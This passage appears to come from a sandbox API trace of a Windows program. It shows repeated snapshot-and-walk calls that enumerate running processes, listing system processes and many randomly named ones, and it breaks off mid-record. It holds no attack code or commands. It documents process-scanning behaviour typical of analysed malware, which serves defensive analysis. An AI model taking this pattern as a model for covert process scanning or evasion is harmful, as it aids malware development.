[0141.664] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0141.665] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0141.666] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.666] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.667] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.667] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.668] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.668] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0141.669] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.670] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.670] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0141.671] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0141.671] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.672] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.673] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.673] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0141.674] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0141.674] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0141.675] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0141.675] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0141.676] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0141.677] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0141.677] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0141.678] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0141.678] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0141.679] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0141.679] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0141.680] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0141.681] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0141.681] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0141.682] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0141.683] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0141.683] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0141.684] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0141.684] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0141.685] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0141.685] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.686] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.686] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.687] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.688] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.688] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.689] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.690] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.690] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.691] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0141.691] CloseHandle (hObject=0x7a8) returned 1 [0141.692] Sleep (dwMilliseconds=0x64) [0141.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7a8 [0141.800] Process32First (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.801] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0141.801] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0141.802] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.802] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0141.803] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.803] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0141.804] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0141.804] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0141.805] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0141.805] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.806] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.806] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.807] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.807] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.808] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0141.808] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.809] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.809] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0141.810] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0141.810] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.811] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.811] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.812] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0141.812] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0141.813] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0141.813] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0141.814] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0141.814] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0141.815] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0141.815] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0141.816] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0141.816] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0141.817] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0141.817] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0141.818] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0141.818] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0146.791] Process32First (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.258] Process32First (hSnapshot=0x554, lppe=0x754f630) [0158.258] Process32First (in: hSnapshot=0x554, lppe=0x754f630 | out: 